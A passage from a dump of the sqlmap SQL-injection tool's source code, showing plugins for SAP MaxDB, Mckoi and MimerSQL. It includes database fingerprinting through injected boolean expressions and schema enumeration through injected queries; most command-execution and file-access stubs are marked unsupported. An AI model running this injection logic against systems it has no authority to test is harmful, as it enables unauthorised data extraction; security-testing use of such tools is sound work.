kb.data.cachedDbs = next(six.itervalues(retVal[0]))\n\n        if kb.data.cachedDbs:\n            kb.data.cachedDbs.sort()\n\n        return kb.data.cachedDbs\n\n    def getTables(self, bruteForce=None):\n        if len(kb.data.cachedTables) > 0:\n            return kb.data.cachedTables\n\n        self.forceDbmsEnum()\n\n        if conf.db == CURRENT_DB:\n            conf.db = self.getCurrentDb()\n\n        if conf.db:\n            dbs = conf.db.split(',')\n        else:\n            dbs = self.getDbs()\n\n        for db in (_ for _ in dbs if _):\n            dbs[dbs.index(db)] = safeSQLIdentificatorNaming(db)\n\n        infoMsg = \"fetching tables for database\"\n        infoMsg += \"%s: %s\" % (\"s\" if len(dbs) > 1 else \"\", \", \".join(db if isinstance(db, six.string_types) else db[0] for db in sorted(dbs)))\n        logger.info(infoMsg)\n\n        rootQuery = queries[DBMS.MAXDB].tables\n\n        for db in dbs:\n            query = rootQuery.inband.query % ((\"'%s'\" % db) if db != \"USER\" else 'USER')\n            blind = not isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION)\n            retVal = pivotDumpTable(\"(%s) AS %s\" % (query, kb.aliasName), ['%s.tablename' % kb.aliasName], blind=blind)\n\n            if retVal:\n                for table in list(retVal[0].values())[0]:\n                    if db not in kb.data.cachedTables:\n                        kb.data.cachedTables[db] = [table]\n                    else:\n                        kb.data.cachedTables[db].append(table)\n\n        for db, tables in kb.data.cachedTables.items():\n            kb.data.cachedTables[db] = sorted(tables) if tables else tables\n\n        return kb.data.cachedTables\n\n    def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None, dumpMode=False):\n        self.forceDbmsEnum()\n\n        if conf.db is None or conf.db == CURRENT_DB:\n            if conf.db is None:\n                warnMsg = \"missing database parameter. sqlmap is going \"\n                warnMsg += \"to use the current database to enumerate \"\n                warnMsg += \"table(s) columns\"\n                logger.warning(warnMsg)\n\n            conf.db = self.getCurrentDb()\n\n        elif conf.db is not None:\n            if ',' in conf.db:\n                errMsg = \"only one database name is allowed when enumerating \"\n                errMsg += \"the tables' columns\"\n                raise SqlmapMissingMandatoryOptionException(errMsg)\n\n        conf.db = safeSQLIdentificatorNaming(conf.db)\n\n        if conf.col:\n            colList = conf.col.split(',')\n        else:\n            colList = []\n\n        if conf.exclude:\n            colList = [_ for _ in colList if re.search(conf.exclude, _, re.I) is None]\n\n        for col in colList:\n            colList[colList.index(col)] = safeSQLIdentificatorNaming(col)\n\n        if conf.tbl:\n            tblList = conf.tbl.split(',')\n        else:\n            self.getTables()\n\n            if len(kb.data.cachedTables) > 0:\n                tblList = list(kb.data.cachedTables.values())\n\n                if tblList and isListLike(tblList[0]):\n                    tblList = tblList[0]\n            else:\n                errMsg = \"unable to retrieve the tables \"\n                errMsg += \"on database '%s'\" % unsafeSQLIdentificatorNaming(conf.db)\n                raise SqlmapNoneDataException(errMsg)\n\n        for tbl in tblList:\n            tblList[tblList.index(tbl)] = safeSQLIdentificatorNaming(tbl, True)\n\n        if bruteForce:\n            resumeAvailable = False\n\n            for tbl in tblList:\n                for db, table, colName, colType in kb.brute.columns:\n                    if db == conf.db and table == tbl:\n                        resumeAvailable = True\n                        break\n\n            if resumeAvailable and not conf.freshQueries or colList:\n                columns = {}\n\n                for column in colList:\n                    columns[column] = None\n\n                for tbl in tblList:\n                    for db, table, colName, colType in kb.brute.columns:\n                        if db == conf.db and table == tbl:\n                            columns[colName] = colType\n\n                    if conf.db in kb.data.cachedColumns:\n                        kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)][safeSQLIdentificatorNaming(tbl, True)] = columns\n                    else:\n                        kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] = {safeSQLIdentificatorNaming(tbl, True): columns}\n\n                return kb.data.cachedColumns\n\n            message = \"do you want to use common column existence check? [y/N/q] \"\n            choice = readInput(message, default='Y' if 'Y' in message else 'N').upper()\n\n            if choice == 'N':\n                return\n            elif choice == 'Q':\n                raise SqlmapUserQuitException\n            else:\n                return columnExists(paths.COMMON_COLUMNS)\n\n        rootQuery = queries[DBMS.MAXDB].columns\n\n        for tbl in tblList:\n            if conf.db is not None and len(kb.data.cachedColumns) > 0 and conf.db in kb.data.cachedColumns and tbl in kb.data.cachedColumns[conf.db]:\n                infoMsg = \"fetched tables' columns on \"\n                infoMsg += \"database '%s'\" % unsafeSQLIdentificatorNaming(conf.db)\n                logger.info(infoMsg)\n\n                return {conf.db: kb.data.cachedColumns[conf.db]}\n\n            if dumpMode and colList:\n                table = {}\n                table[safeSQLIdentificatorNaming(tbl, True)] = dict((_, None) for _ in colList)\n                kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] = table\n                continue\n\n            infoMsg = \"fetching columns \"\n            infoMsg += \"for table '%s' \" % unsafeSQLIdentificatorNaming(tbl)\n            infoMsg += \"on database '%s'\" % unsafeSQLIdentificatorNaming(conf.db)\n            logger.info(infoMsg)\n\n            blind = not isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION)\n\n            query = rootQuery.inband.query % (unsafeSQLIdentificatorNaming(tbl), (\"'%s'\" % unsafeSQLIdentificatorNaming(conf.db)) if unsafeSQLIdentificatorNaming(conf.db) != \"USER\" else 'USER')\n            retVal = pivotDumpTable(\"(%s) AS %s\" % (query, kb.aliasName), ['%s.columnname' % kb.aliasName, '%s.datatype' % kb.aliasName, '%s.len' % kb.aliasName], blind=blind)\n\n            if retVal:\n                table = {}\n                columns = {}\n\n                for columnname, datatype, length in _zip(retVal[0][\"%s.columnname\" % kb.aliasName], retVal[0][\"%s.datatype\" % kb.aliasName], retVal[0][\"%s.len\" % kb.aliasName]):\n                    columns[safeSQLIdentificatorNaming(columnname)] = \"%s(%s)\" % (datatype, length)\n\n                table[tbl] = columns\n                kb.data.cachedColumns[conf.db] = table\n\n        return kb.data.cachedColumns\n\n    def getPrivileges(self, *args, **kwargs):\n        warnMsg = \"on SAP MaxDB it is not possible to enumerate the user privileges\"\n        logger.warning(warnMsg)\n\n        return {}\n\n    def search(self):\n        warnMsg = \"on SAP MaxDB search option is not available\"\n        logger.warning(warnMsg)\n\n    def getHostname(self):\n        warnMsg = \"on SAP MaxDB it is not possible to enumerate the hostname\"\n        logger.warning(warnMsg)\n\n    def getStatements(self):\n        warnMsg = \"on SAP MaxDB it is not possible to enumerate the SQL statements\"\n        logger.warning(warnMsg)\n\n        return []\n"
  },
  {
    "path": "sqlmap/plugins/dbms/maxdb/filesystem.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.exception import SqlmapUnsupportedFeatureException\nfrom plugins.generic.filesystem import Filesystem as GenericFilesystem\n\nclass Filesystem(GenericFilesystem):\n    def readFile(self, remoteFile):\n        errMsg = \"on SAP MaxDB reading of files is not supported\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n\n    def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False):\n        errMsg = \"on SAP MaxDB writing of files is not supported\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n"
  },
  {
    "path": "sqlmap/plugins/dbms/maxdb/fingerprint.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.agent import agent\nfrom lib.core.common import Backend\nfrom lib.core.common import Format\nfrom lib.core.compat import xrange\nfrom lib.core.data import conf\nfrom lib.core.data import kb\nfrom lib.core.data import logger\nfrom lib.core.enums import DBMS\nfrom lib.core.session import setDbms\nfrom lib.core.settings import MAXDB_ALIASES\nfrom lib.request import inject\nfrom lib.request.connect import Connect as Request\nfrom plugins.generic.fingerprint import Fingerprint as GenericFingerprint\n\nclass Fingerprint(GenericFingerprint):\n    def __init__(self):\n        GenericFingerprint.__init__(self, DBMS.MAXDB)\n\n    def _versionCheck(self):\n        infoMsg = \"executing %s SYSINFO version check\" % DBMS.MAXDB\n        logger.info(infoMsg)\n\n        query = agent.prefixQuery(\"/* NoValue */\")\n        query = agent.suffixQuery(query)\n        payload = agent.payload(newValue=query)\n        result = Request.queryPage(payload)\n\n        if not result:\n            warnMsg = \"unable to perform %s version check\" % DBMS.MAXDB\n            logger.warning(warnMsg)\n\n            return None\n\n        minor, major = None, None\n\n        for version in (6, 7):\n            result = inject.checkBooleanExpression(\"%d=(SELECT MAJORVERSION FROM SYSINFO.VERSION)\" % version)\n\n            if result:\n                major = version\n\n        for version in xrange(0, 10):\n            result = inject.checkBooleanExpression(\"%d=(SELECT MINORVERSION FROM SYSINFO.VERSION)\" % version)\n\n            if result:\n                minor = version\n\n        if major and minor:\n            return \"%s.%s\" % (major, minor)\n        else:\n            return None\n\n    def getFingerprint(self):\n        value = \"\"\n        wsOsFp = Format.getOs(\"web server\", kb.headersFp)\n\n        if wsOsFp:\n            value += \"%s\\n\" % wsOsFp\n\n        if kb.data.banner:\n            dbmsOsFp = Format.getOs(\"back-end DBMS\", kb.bannerFp)\n\n            if dbmsOsFp:\n                value += \"%s\\n\" % dbmsOsFp\n\n        blank = \" \" * 15\n        value += \"back-end DBMS: \"\n\n        if not conf.extensiveFp:\n            value += DBMS.MAXDB\n            return value\n\n        actVer = Format.getDbms() + \" (%s)\" % self._versionCheck()\n        blank = \" \" * 15\n        value += \"active fingerprint: %s\" % actVer\n\n        if kb.bannerFp:\n            value += \"\\n%sbanner parsing fingerprint: -\" % blank\n\n        htmlErrorFp = Format.getErrorParsedDBMSes()\n\n        if htmlErrorFp:\n            value += \"\\n%shtml error message fingerprint: %s\" % (blank, htmlErrorFp)\n\n        return value\n\n    def checkDbms(self):\n        if not conf.extensiveFp and Backend.isDbmsWithin(MAXDB_ALIASES):\n            setDbms(DBMS.MAXDB)\n\n            self.getBanner()\n\n            return True\n\n        infoMsg = \"testing %s\" % DBMS.MAXDB\n        logger.info(infoMsg)\n\n        result = inject.checkBooleanExpression(\"ALPHA(NULL) IS NULL\")\n\n        if result:\n            infoMsg = \"confirming %s\" % DBMS.MAXDB\n            logger.info(infoMsg)\n\n            result = inject.checkBooleanExpression(\"MAPCHAR(NULL,1,DEFAULTMAP) IS NULL\")\n\n            if not result:\n                warnMsg = \"the back-end DBMS is not %s\" % DBMS.MAXDB\n                logger.warning(warnMsg)\n\n                return False\n\n            setDbms(DBMS.MAXDB)\n\n            self.getBanner()\n\n            return True\n        else:\n            warnMsg = \"the back-end DBMS is not %s\" % DBMS.MAXDB\n            logger.warning(warnMsg)\n\n            return False\n\n    def forceDbmsEnum(self):\n        if conf.db:\n            conf.db = conf.db.upper()\n        else:\n            conf.db = \"USER\"\n\n        if conf.tbl:\n            conf.tbl = conf.tbl.upper()\n"
  },
  {
    "path": "sqlmap/plugins/dbms/maxdb/syntax.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom plugins.generic.syntax import Syntax as GenericSyntax\n\nclass Syntax(GenericSyntax):\n    @staticmethod\n    def escape(expression, quote=True):\n        \"\"\"\n        >>> Syntax.escape(\"SELECT 'abcdefgh' FROM foobar\") == \"SELECT 'abcdefgh' FROM foobar\"\n        True\n        \"\"\"\n\n        return expression\n"
  },
  {
    "path": "sqlmap/plugins/dbms/maxdb/takeover.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.exception import SqlmapUnsupportedFeatureException\nfrom plugins.generic.takeover import Takeover as GenericTakeover\n\nclass Takeover(GenericTakeover):\n    def osCmd(self):\n        errMsg = \"on SAP MaxDB it is not possible to execute commands\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n\n    def osShell(self):\n        errMsg = \"on SAP MaxDB it is not possible to execute commands\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n\n    def osPwn(self):\n        errMsg = \"on SAP MaxDB it is not possible to establish an \"\n        errMsg += \"out-of-band connection\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n\n    def osSmb(self):\n        errMsg = \"on SAP MaxDB it is not possible to establish an \"\n        errMsg += \"out-of-band connection\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n"
  },
  {
    "path": "sqlmap/plugins/dbms/mckoi/__init__.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.enums import DBMS\nfrom lib.core.settings import MCKOI_SYSTEM_DBS\nfrom lib.core.unescaper import unescaper\nfrom plugins.dbms.mckoi.enumeration import Enumeration\nfrom plugins.dbms.mckoi.filesystem import Filesystem\nfrom plugins.dbms.mckoi.fingerprint import Fingerprint\nfrom plugins.dbms.mckoi.syntax import Syntax\nfrom plugins.dbms.mckoi.takeover import Takeover\nfrom plugins.generic.misc import Miscellaneous\n\nclass MckoiMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):\n    \"\"\"\n    This class defines Mckoi methods\n    \"\"\"\n\n    def __init__(self):\n        self.excludeDbsList = MCKOI_SYSTEM_DBS\n\n        for cls in self.__class__.__bases__:\n            cls.__init__(self)\n\n    unescaper[DBMS.MCKOI] = Syntax.escape\n"
  },
  {
    "path": "sqlmap/plugins/dbms/mckoi/connector.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.exception import SqlmapUnsupportedFeatureException\nfrom plugins.generic.connector import Connector as GenericConnector\n\nclass Connector(GenericConnector):\n    def connect(self):\n        errMsg = \"on Mckoi it is not (currently) possible to establish a \"\n        errMsg += \"direct connection\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n"
  },
  {
    "path": "sqlmap/plugins/dbms/mckoi/enumeration.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.data import logger\nfrom plugins.generic.enumeration import Enumeration as GenericEnumeration\n\nclass Enumeration(GenericEnumeration):\n    def getBanner(self):\n        warnMsg = \"on Mckoi it is not possible to get the banner\"\n        logger.warning(warnMsg)\n\n        return None\n\n    def getCurrentUser(self):\n        warnMsg = \"on Mckoi it is not possible to enumerate the current user\"\n        logger.warning(warnMsg)\n\n    def getCurrentDb(self):\n        warnMsg = \"on Mckoi it is not possible to get name of the current database\"\n        logger.warning(warnMsg)\n\n    def isDba(self, user=None):\n        warnMsg = \"on Mckoi it is not possible to test if current user is DBA\"\n        logger.warning(warnMsg)\n\n    def getUsers(self):\n        warnMsg = \"on Mckoi it is not possible to enumerate the users\"\n        logger.warning(warnMsg)\n\n        return []\n\n    def getPasswordHashes(self):\n        warnMsg = \"on Mckoi it is not possible to enumerate the user password hashes\"\n        logger.warning(warnMsg)\n\n        return {}\n\n    def getPrivileges(self, *args, **kwargs):\n        warnMsg = \"on Mckoi it is not possible to enumerate the user privileges\"\n        logger.warning(warnMsg)\n\n        return {}\n\n    def getDbs(self):\n        warnMsg = \"on Mckoi it is not possible to enumerate databases (use only '--tables')\"\n        logger.warning(warnMsg)\n\n        return []\n\n    def searchDb(self):\n        warnMsg = \"on Mckoi it is not possible to search databases\"\n        logger.warning(warnMsg)\n\n        return []\n\n    def searchTable(self):\n        warnMsg = \"on Mckoi it is not possible to search tables\"\n        logger.warning(warnMsg)\n\n        return []\n\n    def searchColumn(self):\n        warnMsg = \"on Mckoi it is not possible to search columns\"\n        logger.warning(warnMsg)\n\n        return []\n\n    def search(self):\n        warnMsg = \"on Mckoi search option is not available\"\n        logger.warning(warnMsg)\n\n    def getHostname(self):\n        warnMsg = \"on Mckoi it is not possible to enumerate the hostname\"\n        logger.warning(warnMsg)\n\n    def getStatements(self):\n        warnMsg = \"on Mckoi it is not possible to enumerate the SQL statements\"\n        logger.warning(warnMsg)\n\n        return []\n"
  },
  {
    "path": "sqlmap/plugins/dbms/mckoi/filesystem.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.exception import SqlmapUnsupportedFeatureException\nfrom plugins.generic.filesystem import Filesystem as GenericFilesystem\n\nclass Filesystem(GenericFilesystem):\n    def readFile(self, remoteFile):\n        errMsg = \"on Mckoi it is not possible to read files\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n\n    def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False):\n        errMsg = \"on Mckoi it is not possible to write files\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n"
  },
  {
    "path": "sqlmap/plugins/dbms/mckoi/fingerprint.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.common import Backend\nfrom lib.core.common import Format\nfrom lib.core.data import conf\nfrom lib.core.data import kb\nfrom lib.core.data import logger\nfrom lib.core.enums import DBMS\nfrom lib.core.session import setDbms\nfrom lib.core.settings import MCKOI_ALIASES\nfrom lib.core.settings import MCKOI_DEFAULT_SCHEMA\nfrom lib.request import inject\nfrom plugins.generic.fingerprint import Fingerprint as GenericFingerprint\n\nclass Fingerprint(GenericFingerprint):\n    def __init__(self):\n        GenericFingerprint.__init__(self, DBMS.MCKOI)\n\n    def getFingerprint(self):\n        value = \"\"\n        wsOsFp = Format.getOs(\"web server\", kb.headersFp)\n\n        if wsOsFp:\n            value += \"%s\\n\" % wsOsFp\n\n        if kb.data.banner:\n            dbmsOsFp = Format.getOs(\"back-end DBMS\", kb.bannerFp)\n\n            if dbmsOsFp:\n                value += \"%s\\n\" % dbmsOsFp\n\n        value += \"back-end DBMS: \"\n\n        if not conf.extensiveFp:\n            value += DBMS.MCKOI\n            return value\n\n        actVer = Format.getDbms()\n        blank = \" \" * 15\n        value += \"active fingerprint: %s\" % actVer\n\n        if kb.bannerFp:\n            banVer = kb.bannerFp.get(\"dbmsVersion\")\n\n            if banVer:\n                banVer = Format.getDbms([banVer])\n                value += \"\\n%sbanner parsing fingerprint: %s\" % (blank, banVer)\n\n        htmlErrorFp = Format.getErrorParsedDBMSes()\n\n        if htmlErrorFp:\n            value += \"\\n%shtml error message fingerprint: %s\" % (blank, htmlErrorFp)\n\n        return value\n\n    def checkDbms(self):\n        if not conf.extensiveFp and Backend.isDbmsWithin(MCKOI_ALIASES):\n            setDbms(DBMS.MCKOI)\n            return True\n\n        infoMsg = \"testing %s\" % DBMS.MCKOI\n        logger.info(infoMsg)\n\n        result = inject.checkBooleanExpression(\"DATEOB()>=DATEOB(NULL)\")\n\n        if result:\n            infoMsg = \"confirming %s\" % DBMS.MCKOI\n            logger.info(infoMsg)\n\n            result = inject.checkBooleanExpression(\"ABS(1/0)>ABS(0/1)\")\n\n            if not result:\n                warnMsg = \"the back-end DBMS is not %s\" % DBMS.MCKOI\n                logger.warning(warnMsg)\n\n                return False\n\n            setDbms(DBMS.MCKOI)\n\n            return True\n        else:\n            warnMsg = \"the back-end DBMS is not %s\" % DBMS.MCKOI\n            logger.warning(warnMsg)\n\n            return False\n\n    def forceDbmsEnum(self):\n        conf.db = MCKOI_DEFAULT_SCHEMA\n"
  },
  {
    "path": "sqlmap/plugins/dbms/mckoi/syntax.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom plugins.generic.syntax import Syntax as GenericSyntax\n\nclass Syntax(GenericSyntax):\n    @staticmethod\n    def escape(expression, quote=True):\n        \"\"\"\n        >>> Syntax.escape(\"SELECT 'abcdefgh' FROM foobar\") == \"SELECT 'abcdefgh' FROM foobar\"\n        True\n        \"\"\"\n\n        return expression\n"
  },
  {
    "path": "sqlmap/plugins/dbms/mckoi/takeover.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.exception import SqlmapUnsupportedFeatureException\nfrom plugins.generic.takeover import Takeover as GenericTakeover\n\nclass Takeover(GenericTakeover):\n    def osCmd(self):\n        errMsg = \"on Mckoi it is not possible to execute commands\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n\n    def osShell(self):\n        errMsg = \"on Mckoi it is not possible to execute commands\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n\n    def osPwn(self):\n        errMsg = \"on Mckoi it is not possible to establish an \"\n        errMsg += \"out-of-band connection\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n\n    def osSmb(self):\n        errMsg = \"on Mckoi it is not possible to establish an \"\n        errMsg += \"out-of-band connection\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n"
  },
  {
    "path": "sqlmap/plugins/dbms/mimersql/__init__.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.enums import DBMS\nfrom lib.core.settings import MIMERSQL_SYSTEM_DBS\nfrom lib.core.unescaper import unescaper\n\nfrom plugins.dbms.mimersql.enumeration import Enumeration\nfrom plugins.dbms.mimersql.filesystem import Filesystem\nfrom plugins.dbms.mimersql.fingerprint import Fingerprint\nfrom plugins.dbms.mimersql.syntax import Syntax\nfrom plugins.dbms.mimersql.takeover import Takeover\nfrom plugins.generic.misc import Miscellaneous\n\nclass MimerSQLMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):\n    \"\"\"\n    This class defines MimerSQL methods\n    \"\"\"\n\n    def __init__(self):\n        self.excludeDbsList = MIMERSQL_SYSTEM_DBS\n\n        for cls in self.__class__.__bases__:\n            cls.__init__(self)\n\n    unescaper[DBMS.MIMERSQL] = Syntax.escape\n"
  },
  {
    "path": "sqlmap/plugins/dbms/mimersql/connector.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\ntry:\n    import mimerpy\nexcept:\n    pass\n\nimport logging\n\nfrom lib.core.common import getSafeExString\nfrom lib.core.data import conf\nfrom lib.core.data import logger\nfrom lib.core.exception import SqlmapConnectionException\nfrom plugins.generic.connector import Connector as GenericConnector\n\nclass Connector(GenericConnector):\n    \"\"\"\n    Homepage: https://github.com/mimersql/MimerPy\n    User guide: https://github.com/mimersql/MimerPy/blob/master/README.rst\n    API: https://www.python.org/dev/peps/pep-0249/\n    License: MIT\n    \"\"\"\n\n    def connect(self):\n        self.initConnection()\n\n        try:\n            self.connector = mimerpy.connect(hostname=self.hostname, username=self.user, password=self.password, database=self.db, port=self.port, connect_timeout=conf.timeout)\n        except mimerpy.OperationalError as ex:\n            raise SqlmapConnectionException(getSafeExString(ex))\n\n        self.initCursor()\n        self.printConnected()\n\n    def fetchall(self):\n        try:\n            return self.cursor.fetchall()\n        except mimerpy.ProgrammingError as ex:\n            logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, \"(remote) %s\" % getSafeExString(ex))\n            return None\n\n    def execute(self, query):\n        try:\n            self.cursor.execute(query)\n        except (mimerpy.OperationalError, mimerpy.ProgrammingError) as ex:\n            logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, \"(remote) %s\" % getSafeExString(ex))\n        except mimerpy.InternalError as ex:\n            raise SqlmapConnectionException(getSafeExString(ex))\n\n        self.connector.commit()\n\n    def select(self, query):\n        self.execute(query)\n        return self.fetchall()\n"
  },
  {
    "path": "sqlmap/plugins/dbms/mimersql/enumeration.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.data import logger\nfrom plugins.generic.enumeration import Enumeration as GenericEnumeration\n\nclass Enumeration(GenericEnumeration):\n    def getPasswordHashes(self):\n        warnMsg = \"on MimerSQL it is not possible to enumerate password hashes\"\n        logger.warning(warnMsg)\n\n        return {}\n\n    def getStatements(self):\n        warnMsg = \"on MimerSQL it is not possible to enumerate the SQL statements\"\n        logger.warning(warnMsg)\n\n        return []\n\n    def getRoles(self, *args, **kwargs):\n        warnMsg = \"on MimerSQL it is not possible to enumerate the user roles\"\n        logger.warning(warnMsg)\n\n        return {}\n\n    def getHostname(self):\n        warnMsg = \"on MimerSQL it is not possible to enumerate the hostname\"\n        logger.warning(warnMsg)\n"
  },
  {
    "path": "sqlmap/plugins/dbms/mimersql/filesystem.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom plugins.generic.filesystem import Filesystem as GenericFilesystem\n\nclass Filesystem(GenericFilesystem):\n    pass\n"
  },
  {
    "path": "sqlmap/plugins/dbms/mimersql/fingerprint.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.common import Backend\nfrom lib.core.common import Format\nfrom lib.core.data import conf\nfrom lib.core.data import kb\nfrom lib.core.data import logger\nfrom lib.core.enums import DBMS\nfrom lib.core.session import setDbms\nfrom lib.core.settings import MIMERSQL_ALIASES\nfrom lib.request import inject\nfrom plugins.generic.fingerprint import Fingerprint as GenericFingerprint\n\nclass Fingerprint(GenericFingerprint):\n    def __init__(self):\n        GenericFingerprint.__init__(self, DBMS.MIMERSQL)\n\n    def getFingerprint(self):\n        value = \"\"\n        wsOsFp = Format.getOs(\"web server\", kb.headersFp)\n\n        if wsOsFp:\n            value += \"%s\\n\" % wsOsFp\n\n        if kb.data.banner:\n            dbmsOsFp = Format.getOs(\"back-end DBMS\", kb.bannerFp)\n\n            if dbmsOsFp:\n                value += \"%s\\n\" % dbmsOsFp\n\n        value += \"back-end DBMS: \"\n\n        if not conf.extensiveFp:\n            value += DBMS.MIMERSQL\n            return value\n\n        actVer = Format.getDbms()\n        blank = \" \" * 15\n        value += \"active fingerprint: %s\" % actVer\n\n        if kb.bannerFp:\n            banVer = kb.bannerFp.get(\"dbmsVersion\")\n\n            if banVer:\n                banVer = Format.getDbms([banVer])\n                value += \"\\n%sbanner parsing fingerprint: %s\" % (blank, banVer)\n\n        htmlErrorFp = Format.getErrorParsedDBMSes()\n\n        if htmlErrorFp:\n            value += \"\\n%shtml error message fingerprint: %s\" % (blank, htmlErrorFp)\n\n        return value\n\n    def checkDbms(self):\n        if not conf.extensiveFp and Backend.isDbmsWithin(MIMERSQL_ALIASES):\n            setDbms(DBMS.MIMERSQL)\n\n            self.getBanner()\n\n            return True\n\n        infoMsg = \"testing %s\" % DBMS.MIMERSQL\n        logger.info(infoMsg)\n\n        result = inject.checkBooleanExpression(\"IRAND()>=0\")\n\n        if result:\n            infoMsg = \"confirming %s\" % DBMS.MIMERSQL\n            logger.info(infoMsg)\n\n            result = inject.checkBooleanExpression(\"PASTE('[RANDSTR1]',0,0,'[RANDSTR2]')='[RANDSTR2][RANDSTR1]'\")\n\n            if not result:\n                warnMsg = \"the back-end DBMS is not %s\" % DBMS.MIMERSQL\n                logger.warning(warnMsg)\n\n                return False\n\n            setDbms(DBMS.MIMERSQL)\n\n            self.getBanner()\n\n            return True\n        else:\n            warnMsg = \"the back-end DBMS is not %s\" % DBMS.MIMERSQL\n            logger.warning(warnMsg)\n\n            return False\n"
  },
  {
    "path": "sqlmap/plugins/dbms/mimersql/syntax.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.convert import getOrds\nfrom plugins.generic.syntax import Syntax as GenericSyntax\n\nclass Syntax(GenericSyntax):\n    @staticmethod\n    def escape(expression, quote=True):\n        \"\"\"\n        >>> from lib.core.common import Backend\n        >>> Syntax.escape(\"SELECT 'abcdefgh' FROM foobar\") == \"SELECT UNICODE_CHAR(97)||UNICODE_CHAR(98)||UNICODE_CHAR(99)||UNICODE_CHAR(100)||UNICODE_CHAR(101)||UNICODE_CHAR(102)||UNICODE_CHAR(103)||UNICODE_CHAR(104) FROM foobar\"\n        True\n        \"\"\"\n\n        def escaper(value):\n            return \"||\".join(\"UNICODE_CHAR(%d)\" % _ for _ in getOrds(value))\n\n        return Syntax._escape(expression, quote, escaper)\n"
  },
  {
    "path": "sqlmap/plugins/dbms/mimersql/takeover.py",
